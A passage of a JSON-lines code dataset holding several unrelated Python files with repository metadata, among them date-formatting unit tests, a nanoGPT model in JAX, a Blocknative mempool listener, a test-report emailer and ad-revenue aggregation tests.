almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29)\n )\n\n assert not almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29),\n timedelta(minutes=10)\n )\n\n\ndef fake_ugettext(translations):\n \"\"\"\n Create a fake implementation of ugettext, for testing.\n \"\"\"\n def _ugettext(text):\n return translations.get(text, text)\n return _ugettext\n\n\ndef fake_pgettext(translations):\n \"\"\"\n Create a fake implementation of pgettext, for testing.\n \"\"\"\n def _pgettext(context, text):\n return translations.get((context, text), text)\n return _pgettext\n\n\n@ddt.ddt\nclass StrftimeLocalizedTest(unittest.TestCase):\n \"\"\"\n Tests for strftime_localized.\n \"\"\"\n @ddt.data(\n (\"%Y\", \"2013\"),\n (\"%m/%d/%y\", \"02/14/13\"),\n (\"hello\", \"hello\"),\n ('%Y년 %m월 %d일', \"2013년 02월 14일\"),\n (\"%a, %b %d, %Y\", \"Thu, Feb 14, 2013\"),\n (\"%I:%M:%S %p\", \"04:41:17 PM\"),\n (\"%A at %-I%P\", \"Thursday at 4pm\"),\n )\n def test_usual_strftime_behavior(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n assert expected == dtime.strftime(fmt)\n\n @ddt.data(\n (\"SHORT_DATE\", \"Feb 14, 2013\"),\n (\"LONG_DATE\", \"Thursday, February 14, 2013\"),\n (\"TIME\", \"04:41:17 PM\"),\n (\"DAY_AND_TIME\", \"Thursday at 4pm\"),\n (\"%x %X!\", \"Feb 14, 2013 04:41:17 PM!\"),\n )\n def test_shortcuts(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.pgettext', fake_pgettext(translations={\n (\"abbreviated month name\", \"Feb\"): \"XXfebXX\",\n (\"month name\", \"February\"): \"XXfebruaryXX\",\n (\"abbreviated weekday name\", \"Thu\"): \"XXthuXX\",\n (\"weekday name\", \"Thursday\"): \"XXthursdayXX\",\n (\"am/pm indicator\", \"PM\"): \"XXpmXX\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"XXfebXX 14, 2013\"),\n (\"LONG_DATE\", \"XXthursdayXX, XXfebruaryXX 14, 2013\"),\n (\"DATE_TIME\", \"XXfebXX 14, 2013 at 16:41\"),\n (\"TIME\", \"04:41:17 XXpmXX\"),\n (\"%x %X!\", \"XXfebXX 14, 2013 04:41:17 XXpmXX!\"),\n )\n def test_translated_words(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.gettext', fake_ugettext(translations={\n \"SHORT_DATE_FORMAT\": \"date(%Y.%m.%d)\",\n \"LONG_DATE_FORMAT\": \"date(%A.%Y.%B.%d)\",\n \"DATE_TIME_FORMAT\": \"date(%Y.%m.%d@%H.%M)\",\n \"TIME_FORMAT\": \"%Hh.%Mm.%Ss\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"date(2013.02.14)\"),\n (\"Look: %x\", \"Look: date(2013.02.14)\"),\n (\"LONG_DATE\", \"date(Thursday.2013.February.14)\"),\n (\"DATE_TIME\", \"date(2013.02.14@16.41)\"),\n (\"TIME\", \"16h.41m.17s\"),\n (\"The time is: %X\", \"The time is: 16h.41m.17s\"),\n (\"%x %X\", \"date(2013.02.14) 16h.41m.17s\"),\n )\n def test_translated_formats(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.gettext', fake_ugettext(translations={\n \"SHORT_DATE_FORMAT\": \"oops date(%Y.%x.%d)\",\n \"TIME_FORMAT\": \"oops %Hh.%Xm.%Ss\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"Feb 14, 2013\"),\n (\"TIME\", \"04:41:17 PM\"),\n )\n def test_recursion_protection(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @ddt.data(\n \"%\",\n \"Hello%\"\n \"%Y/%m/%d%\",\n )\n def test_invalid_format_strings(self, fmt):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with pytest.raises(ValueError):\n strftime_localized(dtime, fmt)\n\n\n@ddt.ddt\nclass StrftimeLocalizedHtmlTest(unittest.TestCase):\n \"\"\"\n Tests for strftime_localized_html.\n \"\"\"\n def setUp(self):\n super().setUp()\n request = RequestFactory().request()\n self.addCleanup(crum.set_current_request, None)\n crum.set_current_request(request)\n\n @ddt.data(\n None,\n 'Africa/Casablanca',\n )\n def test_happy_path(self, timezone):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with patch('common.djangoapps.util.date_utils.user_timezone_locale_prefs',\n return_value={'user_timezone': timezone}):\n html = strftime_localized_html(dtime, 'SHORT_DATE')\n assert isinstance(html, Markup)\n self.assertRegex(html,\n 'Feb 14, 2013')\n\n def test_invalid_format_string(self):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with self.assertRaisesRegex(AssertionError, 'format \"NOPE\" not yet supported in strftime_localized_html'):\n strftime_localized_html(dtime, 'NOPE')\n","repo_name":"openedx/edx-platform","sub_path":"common/djangoapps/util/tests/test_date_utils.py","file_name":"test_date_utils.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"34099341886","text":"n, c = map(int, input().split())\n\ncells = []\nfor i in range(n):\n cells.append(int(input().strip()))\ncells.sort()\n\nlb = 0\nub = cells[n - 1]\n\n\ndef check_cells(th):\n curr_dis = cells[0]\n cows_cnt = 1\n for i in cells:\n if i - curr_dis >= th:\n curr_dis = i\n cows_cnt += 1\n # print(\"thd\", th, \"cnt\", cows_cnt)\n if cows_cnt >= c:\n return True\n else:\n return False\n\n\nwhile lb < ub - 1:\n mid = (ub + lb) // 2\n # print(\"current range:\", lb, mid, ub)\n if check_cells(mid):\n lb = mid\n else:\n ub = mid\n\nprint(lb)\n","repo_name":"xxu-mzwyt/competitive-programming-solutions","sub_path":"Luogu/P1824.py","file_name":"P1824.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13205130031","text":"from _typeshed import NoneType\n\n\ndef recursive(list1, list2, result):\n a = list1[0]\n b = list2[0]\n \n if len(list1) == 1:\n return [min([a, b]), max([a, b])]\n \n result = [min([a, b]), max([a, b])]\n return result + recursive(list1[1:], list2[1:], result)\n\nlist1 = [1, 2, 4, 7, 9, 10]\nlist2 = [1, 3, 4, 5, 8]\n\nresult = []\nresult = recursive(list1, list2, result)\nresult\n\n### LINKED LIST\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nd1 = ListNode(val=9)\nc1 = ListNode(val=6, next=d1)\nb1 = ListNode(val=4, next=c1)\na1 = ListNode(val=3, next=b1)\n\nd2 = ListNode(val=8)\nc2 = ListNode(val=7, next=d2)\nb2 = ListNode(val=3, next=c2)\na2 = ListNode(val=2, next=b2)\nclass Solution(object):\n def mergeTwoLists(self, list1, list2):\n \"\"\"\n :type list1: Optional[ListNode]\n :type list2: Optional[ListNode]\n :rtype: Optional[ListNode]\n \"\"\"\n root = self.recursive(list1, list2)\n \n return root\n \n def recursive(self, list1, list2):\n if not list1 or not list2:\n return list1 or list2\n \n if list1.val < list2.val:\n list1.next = self.mergeTwoLists(list1.next, list2)\n return list1\n else:\n list2.next = self.mergeTwoLists(list1, list2.next)\n \n return list2\n \n\nsol = Solution()\nres = sol.mergeTwoLists(a1, a2)","repo_name":"aqqosh/python_tasks","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29257758747","text":"import contextlib\nimport json\nimport tarfile\nimport typing as tp\n\nimport pytest\n\nimport yatest.common\n\nfrom maps.garden.sdk.module_traits.module_traits import ModuleTraits, parse_traits\nfrom maps.garden.sdk.module_traits.validation import validate_modules_dependency_graph, \\\n validate_modules_tracked_ancestors, validate_modules_tracked_ancestors_graph, validate_required_fields\n\n\n@pytest.fixture(scope=\"module\")\ndef all_module_traits() -> tp.Dict[str, ModuleTraits]:\n traits_tar = yatest.common.binary_path(\n \"maps/garden/sdk/module_traits/tests/module_traits_bundle/module_traits.tar\")\n with contextlib.closing(tarfile.open(traits_tar, \"r\")) as tar:\n all_traits = {}\n for file_info in tar.getmembers():\n f = tar.extractfile(file_info)\n module_name = file_info.name\n try:\n unparsed_traits = json.load(f)\n all_traits.update(parse_traits([unparsed_traits]))\n except Exception as ex:\n pytest.fail(f\"Failed to parse traits for module {module_name}. Error: {ex}\")\n return all_traits\n\n\ndef test_modules_dependency_graph(all_module_traits):\n validate_modules_dependency_graph(all_module_traits)\n\n\ndef test_modules_tracked_ancestors(all_module_traits):\n validate_modules_tracked_ancestors(all_module_traits)\n\n\ndef test_modules_tracked_ancestors_graph(all_module_traits):\n validate_modules_tracked_ancestors_graph(all_module_traits)\n\n\ndef test_readonly_props(all_module_traits):\n for module_name, traits in all_module_traits.items():\n assert not traits.capabilities, f\"'capabilities' is a read-only field. \" \\\n f\"Got {traits.capabilities} in the traits for module '{module_name}'\"\n\n\ndef test_raise_error():\n with pytest.raises(ValueError) as ex:\n validate_required_fields({\n \"test_module\": ModuleTraits.parse_obj({\n \"name\": \"test_module\",\n \"type\": \"source\"\n }),\n \"test_module_2\": ModuleTraits.parse_obj({\n \"name\": \"test_module_2\",\n \"type\": \"source\"\n }),\n })\n\n assert len(ex.value.args[0].split(\"\\n\")) == 2\n assert \"test_module\" in ex.value.args[0] and \"test_module_2\" in ex.value.args[0]\n assert \"sort_options\" in ex.value.args[0]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/validate_modules_traits.py","file_name":"validate_modules_traits.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71501451922","text":"import jax\nimport jax.numpy as jnp\nfrom jax import random\nfrom jax import jit\nfrom typing import List, Tuple\nimport optax\nimport equinox as eqx\nfrom equinox import static_field\n\n\nclass Head(eqx.Module):\n query: jnp.ndarray\n key: jnp.ndarray\n value: jnp.ndarray\n tril: jnp.ndarray = static_field()\n dropout_rate: float = static_field()\n head_size: float = static_field()\n\n def __init__(self, jax_key, head_size, n_emb, block_size, dropout_rate):\n keys = random.split(jax_key, 3)\n self.query = random.uniform(keys[0], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.key = random.uniform(keys[1], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.value = random.uniform(keys[2], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.tril = jnp.tril(jnp.ones((block_size, block_size)))\n self.dropout_rate = dropout_rate\n self.head_size = head_size\n\n def __call__(self, x, key, is_training):\n B, T, C = x.shape\n\n k = x @ self.key # B, T, H\n q = x @ self.query # B, T, H\n wei = q @ k.transpose(0, 2, 1) * (self.head_size**-0.5) # B, T, T\n wei = jnp.where(self.tril[:T, :T] == 0, -jax.numpy.inf, wei) # B, T, T\n wei = jax.nn.softmax(wei, axis=-1) # B, T, T\n if is_training:\n wei *= random.bernoulli(key, 1 - self.dropout_rate, wei.shape) # dropout\n wei /= 1 - self.dropout_rate\n # perform the weighted aggregation of the values\n v = x @ self.value # B, T, H\n out = wei @ v # B, T, H\n return out\n\n\nclass MultiHeadAttention(eqx.Module):\n heads: List[eqx.Module]\n proj: jnp.ndarray\n dropout_rate: float = static_field()\n\n def __init__(self, jax_key, head_size, n_emb, block_size, num_heads, dropout_rate):\n keys = random.split(jax_key, 1 + num_heads)\n self.heads = [\n Head(keys[index], head_size, n_emb, block_size, dropout_rate)\n for index in range(num_heads)\n ]\n self.proj = random.uniform(keys[-1], (n_emb, n_emb)) * (1 / n_emb**0.5)\n self.dropout_rate = dropout_rate\n\n def __call__(self, x, key, is_training):\n keys = random.split(key, 1 + len(self.heads))\n out = jnp.concatenate(\n [h(x, k, is_training) for h, k in zip(self.heads, keys)], axis=-1\n ) # B, T, E\n out = out @ self.proj # B, T, E\n if is_training:\n out *= random.bernoulli(\n keys[-1], 1 - self.dropout_rate, out.shape\n ) # dropout\n out /= 1 - self.dropout_rate\n return out\n\n\nclass FeedForward(eqx.Module):\n l1: jnp.ndarray\n l2: jnp.ndarray\n dropout_rate: float = static_field()\n\n def __init__(self, jax_key, n_emb, dropout_rate):\n keys = random.split(jax_key, 2)\n self.l1 = random.uniform(keys[0], (n_emb, 4 * n_emb)) * (1 / n_emb**0.5)\n self.l2 = random.uniform(keys[1], (4 * n_emb, n_emb)) * (1 / (4 * n_emb) ** 0.5)\n self.dropout_rate = dropout_rate\n\n def __call__(self, x, key, is_training):\n x = x @ self.l1\n x = jax.nn.relu(x)\n x = x @ self.l2\n if is_training:\n x *= random.bernoulli(key, 1 - self.dropout_rate, x.shape) # dropout\n x /= 1 - self.dropout_rate\n\n return x\n\n\nclass Block(eqx.Module):\n sa: eqx.Module\n ffwd: eqx.Module\n ln1: eqx.Module\n ln2: eqx.Module\n\n \"\"\" Transformer block: communiction followed by computation \"\"\"\n\n def __init__(self, jax_key, n_embd, block_size, n_head, dropout_rate):\n # n_embd: embedding dimension, n_head: the number of heads we would like\n keys = random.split(jax_key, 2)\n head_size = n_embd // n_head\n self.sa = MultiHeadAttention(\n keys[0], head_size, n_embd, block_size, n_head, dropout_rate\n )\n self.ffwd = FeedForward(keys[1], n_embd, dropout_rate)\n self.ln1 = LayerNorm(n_embd)\n self.ln2 = LayerNorm(n_embd)\n\n def __call__(self, x, key, is_training):\n key1, key2 = random.split(key, 2)\n x = x + self.sa(self.ln1(x), key1, is_training)\n x = x + self.ffwd(self.ln2(x), key2, is_training)\n return x\n\n\nclass LayerNorm(eqx.Module):\n gamma: jnp.ndarray\n beta: jnp.ndarray\n eps: float = static_field()\n\n def __init__(self, dim, eps=1e-5):\n self.gamma = jnp.ones(dim)\n self.beta = jnp.zeros(dim)\n self.eps = eps\n\n def __call__(self, x):\n xmean = jnp.mean(x, axis=-1, keepdims=True)\n xvar = jnp.var(x, axis=-1, keepdims=True)\n inv = self.gamma * jax.lax.rsqrt(xvar + self.eps)\n return inv * (x - xmean) + self.beta\n\n\nclass NanoGPT(eqx.Module):\n tok_embedding: jnp.ndarray\n pos_embedding: jnp.ndarray\n lm_head: jnp.ndarray\n blocks: List[eqx.Module]\n ln_f: eqx.Module\n\n def __init__(\n self, jax_key, vocab_size, n_emb, block_size, n_head, n_layer, dropout_rate\n ):\n keys = random.split(jax_key, 3 + n_layer)\n self.tok_embedding = random.uniform(keys[0], (vocab_size, n_emb)) * (\n 1 / vocab_size**0.5\n )\n self.pos_embedding = random.uniform(keys[1], (block_size, n_emb)) * (\n 1 / block_size**0.5\n )\n self.lm_head = random.uniform(keys[2], (n_emb, vocab_size)) * (1 / n_emb**0.5)\n self.blocks = [\n Block(\n jax_key=keys[-index],\n n_embd=n_emb,\n n_head=n_head,\n block_size=block_size,\n dropout_rate=dropout_rate,\n )\n for index in range(n_layer)\n ]\n self.ln_f = LayerNorm(n_emb)\n\n def __call__(self, idx, key, is_training):\n B, T = idx.shape\n # idx and targets are both (B,T) tensor of integers\n\n tok_emb = self.tok_embedding[idx] # (B, T, C)\n pos_emb = self.pos_embedding[jnp.arange(T)] # (T, C)\n x = pos_emb + tok_emb # (B, T, C)\n\n keys = random.split(key, len(self.blocks))\n for block, k in zip(self.blocks, keys):\n x = block(x, k, is_training)\n x = self.ln_f(x)\n logits = x @ self.lm_head\n\n return logits\n","repo_name":"mahakal001/nanogpt-jax","sub_path":"nanogpt_jax/nanogpt_jax.py","file_name":"nanogpt_jax.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29050346382","text":"from blocknative.stream import Stream as BNStream\nimport json,sys,traceback,logging\n\nmonitor_address = '0x7a250d5630b4cf539739df2c5dacb4c659f2488d'\n\nasync def txn_handler(txn, unsubscribe):\n print(json.dumps(txn, indent=4))\n\nif __name__ == '__main__':\n try:\n if len(sys.argv) == 1:\n print('%s apikey' % sys.argv[0])\n else:\n logging.basicConfig(level=logging.INFO) \n apikeyfile = sys.argv[1]\n with open(apikeyfile, 'r') as apikey:\n keystring = apikey.readline().rstrip().lstrip()\n stream = BNStream(keystring)\n filter = {'network': 'main'}\n stream.subscribe_address(monitor_address, txn_handler, filters=[filter])\n stream.connect()\n except Exception as e:\n logging.error('API Failed: %s', str(e))\n traceback.print_exc(e)\n","repo_name":"blocknative/python-sdk","sub_path":"examples/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"3"} +{"seq_id":"71556212562","text":"import smtplib\nimport os, zipfile, time\nimport sys\n\"\"\"发送纯文本信息\"\"\"\nfrom email.mime.text import MIMEText\n\"\"\"混合信息\"\"\"\nfrom email.mime.multipart import MIMEMultipart\n\"\"\"导入配置库\"\"\"\nfrom lang.common.ini_read import *\n\nbasedir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(basedir)\n\n\n# def zip_report(input_path, output_path, output_name):\n# \"\"\"将测试报告生成压缩文件\"\"\"\n# f = zipfile.ZipFile(output_path+'/' + output_name, 'w', zipfile.ZIP_DEFLATED)\n# files = os.listdir(input_path)\n# for file in files:\n# if os.path.splitext(file)[1] == \".html\":\n# f.write(input_path + '/' + file)\n# f.close()\n# return output_path+r\"/\"+output_name\n\n\ndef send_mail_report(title):\n \"\"\"将测试报告发送到邮件\"\"\"\n\n \"\"\"获取测试报告邮件服务器、发件人、收件人等信息\"\"\"\n \"\"\"发件人\"\"\"\n sender = ini_options('mail', 'sender', 'config')\n \"\"\"收件人\"\"\"\n receiver = ini_options('mail', 'receiver', 'config')\n \"\"\"smtp服务器\"\"\"\n smtp_server = ini_options('mail', 'smtp_server', 'config')\n \"\"\"smtp服务端口\"\"\"\n mail_port = ini_options('mail', 'mail_port', 'config')\n \"\"\"账户\"\"\"\n username = ini_options('mail', 'username', 'config')\n \"\"\"密码\"\"\"\n password = ini_options('mail', 'password', 'config')\n\n msg_root = MIMEMultipart(\"related\")\n msg_root[\"subject\"] = title\n msg_root[\"from\"] = sender\n msg_root[\"to\"] = receiver\n body = \"hi, All! 附件为交易网关业务功能【QA环境】版本接口测试报告,请注意查看!\"\n msg_html = MIMEText(body, 'html', 'utf-8')\n msg_root.attach(msg_html)\n\n \"\"\"获取最新测试报告\"\"\"\n report_path = basedir+\"/lang/report/\"\n new_report = \"\"\n for root, subdirs, files in os.walk(report_path):\n for file in files:\n \"\"\"判断该目录下的文件扩展名是否为html\"\"\"\n if os.path.splitext(file)[1] == \".html\":\n new_report = file\n\n # \"\"\"改变当前的相对路径由 testSuite变更为report,然后压缩report下面的测试报告Report.html文件\"\"\"\n # os.chdir(report_path)\n # cwd = os.getcwd()\n # print(\"cwd is:\"+cwd)\n # \"\"\"将Report.html文件压缩成.zip文件,存放路径为./report\"\"\"\n # zip_report(r\"./\", './', 'payCenter_API_Test_Report.zip')\n\n \"\"\"生成邮件的内容\"\"\"\n msg = MIMEMultipart()\n msg[\"subject\"] = title\n msg['date'] = time.strftime('%a, %d %b %Y %H:%M:%S %z')\n with open(os.path.join(report_path, new_report), 'rb') as f:\n mailbody = f.read()\n html = MIMEText(mailbody, _subtype='html', _charset='utf-8')\n msg.attach(html)\n\n \"\"\"将测试报告压缩文件添加到邮件附件\"\"\"\n # att = MIMEText(open('./payCenter_API_Test_Report.zip', 'rb').read(), 'base64', 'utf-8')\n att = MIMEText(open(os.path.join(report_path, new_report), 'rb').read(), 'base64', 'utf-8')\n att[\"Content-Type\"] = 'application/octet-stream'\n att.add_header(\"Content-Disposition\", \"attachment\", filename=\"Report.html\")\n msg.attach(att)\n\n \"\"\"发送邮件\"\"\"\n msg['from'] = sender\n try:\n smtp = smtplib.SMTP_SSL(smtp_server, 465)\n # smtp = smtplib.SMTP()\n # smtp.connect(smtp_server, mail_port)\n smtp.login(username, password)\n smtp.sendmail(sender, receiver.split(','), msg.as_string())\n smtp.close()\n print(\"邮件发送成功\")\n except Exception:\n print(\"Error :无法发送邮件\")\n raise\n\n\nif __name__ == '__main__':\n send_mail_report(\"【lang-QA环境】APP——UI自动化冒烟测试\")\n","repo_name":"xieguoyong/Lang-UI-Tests","sub_path":"lang/tools/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29039675067","text":"import pytest\nimport pandas as pd\n\nfrom antiadblock.tasks.tools.yt_utils import get_available_yt_cluster\nimport antiadblock.tasks.tools.common_configs as configs\nfrom antiadblock.tasks.money_by_service_id.lib.lib import Columns, DIMENSIONS, AGGREGATION_FIELDS, PREFIXES, METRICS, get_dataframe, consume_dataframe, get_sensors\n\n\nBSDSP_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + PREFIXES + METRICS,\n)\nBSCHEVENT_ONLY_BLOCKS_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 1] + [2] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1, 1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + PREFIXES + METRICS,\n)\nEVENTBAD_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + [Columns.aab.name] + METRICS,\n)\nEXPECTED_JOINED = pd.DataFrame(\n data=[\n [pd.Timestamp('2019-12-10 00:00:00'), 'autoru', 'direct', 'desktop', 'auto.ru', 2, 1, 4, 4, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [pd.Timestamp('2019-12-10 01:00:00'), 'autoru', 'direct', 'desktop', 'auto.ru', 4, 2, 8, 8, 4, 4, 4, 4, 4, 2, 2, 2, 1, 1, 1, 1, 1, 1],\n [pd.Timestamp('2019-12-10 01:00:00'), 'docviewer', 'direct', 'desktop', 'docviewer.yandex.ru', 2, 1, 4, 4, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + ['money', 'aab_money', 'shows', 'clicks', 'aab_shows', 'aab_clicks', 'fraud_money', 'fraud_shows',\n 'fraud_clicks', 'aab_fraud_money', 'aab_fraud_shows', 'aab_fraud_clicks', 'bad_money',\n 'aab_bad_money', 'bad_shows', 'aab_bad_shows', 'bad_clicks', 'aab_bad_clicks']\n).set_index(DIMENSIONS + AGGREGATION_FIELDS)\n\n\ndef test_get_dataframe():\n dataframe = get_dataframe(BSDSP_YQL, BSCHEVENT_ONLY_BLOCKS_YQL, EVENTBAD_YQL)\n assert dataframe.equals(EXPECTED_JOINED)\n\n joined_spoiled = EXPECTED_JOINED.copy()\n joined_spoiled.iloc[0]['money'] = 0\n assert not dataframe.equals(joined_spoiled)\n\n\n@pytest.mark.parametrize('scale', configs.Scales)\ndef test_consume_dataframe_stat(scale):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n expeted_stat_row = {\n 'service_id': '---placeholder---',\n 'fielddate': '2019-12-10 00:00:00',\n 'money': 2,\n 'aab_money': 1,\n 'shows': 4,\n 'clicks': 4,\n 'aab_shows': 2,\n 'aab_clicks': 2,\n 'fraud_money': 2,\n 'fraud_shows': 2,\n 'fraud_clicks': 2,\n 'aab_fraud_money': 1,\n 'aab_fraud_shows': 1,\n 'aab_fraud_clicks': 1,\n 'bad_money': 1,\n 'aab_bad_money': 1,\n 'bad_shows': 1,\n 'aab_bad_shows': 1,\n 'bad_clicks': 1,\n 'aab_bad_clicks': 1\n }\n expected_stat_data = []\n for tree in [['TOTAL'],\n ['TOTAL', 'producttype', 'direct'],\n ['TOTAL', 'device', 'desktop'],\n ['TOTAL', 'domain', 'auto.ru'],\n ['TOTAL', 'producttype', 'direct', 'device', 'desktop'],\n ['autoru'],\n ['autoru', 'producttype', 'direct'],\n ['autoru', 'device', 'desktop'],\n ['autoru', 'domain', 'auto.ru'],\n ['autoru', 'producttype', 'direct', 'device', 'desktop']]:\n expected_stat_data.append(expeted_stat_row.copy())\n expected_stat_data[-1]['service_id'] = tree\n\n stat, _ = consume_dataframe(dataframe, scale=scale)\n assert stat == expected_stat_data\n\n\n@pytest.mark.parametrize('scale', configs.Scales)\ndef test_consume_dataframe_solomon(scale):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n expeted_sensors = [\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'producttype': '_all', 'device': '_all'}},\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'device': '_all', 'producttype': 'direct'}},\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'producttype': '_all', 'device': 'desktop'}},\n ]\n _, solomon = consume_dataframe(dataframe, scale=scale, calculate_ratios=[('ratio name', ('aab_money', 'money'))])\n assert solomon == expeted_sensors\n\n\n@pytest.mark.parametrize('ratio, value', [\n [[('name', ('aab_money', 'money'))], 50.],\n [[('name', ('money', 'money'))], 100.],\n [[('name', ('money', 'bad_money'))], 200.],\n])\ndef test_get_sensors(ratio, value):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n solomon = get_sensors(dataframe, ratios=ratio)\n assert solomon == [{'ts': 1575925200.0, 'value': value, 'labels': {'sensor': 'name', 'service_id': 'autoru'}}]\n\n\n@pytest.mark.parametrize('current_cluster,available_clusters,expected_cluster,is_exception', [\n ['hahn', '[\"hahn\", \"arnold\"]', 'hahn', False],\n ['hahn', '[\"arnold\"]', 'arnold', False],\n ['hahn', None, 'hahn', False],\n ['hahn', '[]', 'hahn', True],\n])\ndef test_get_available_yt_cluster(current_cluster, available_clusters, expected_cluster, is_exception):\n if not is_exception:\n assert expected_cluster == get_available_yt_cluster(current_cluster, available_clusters)\n else:\n with pytest.raises(Exception):\n get_available_yt_cluster(current_cluster, 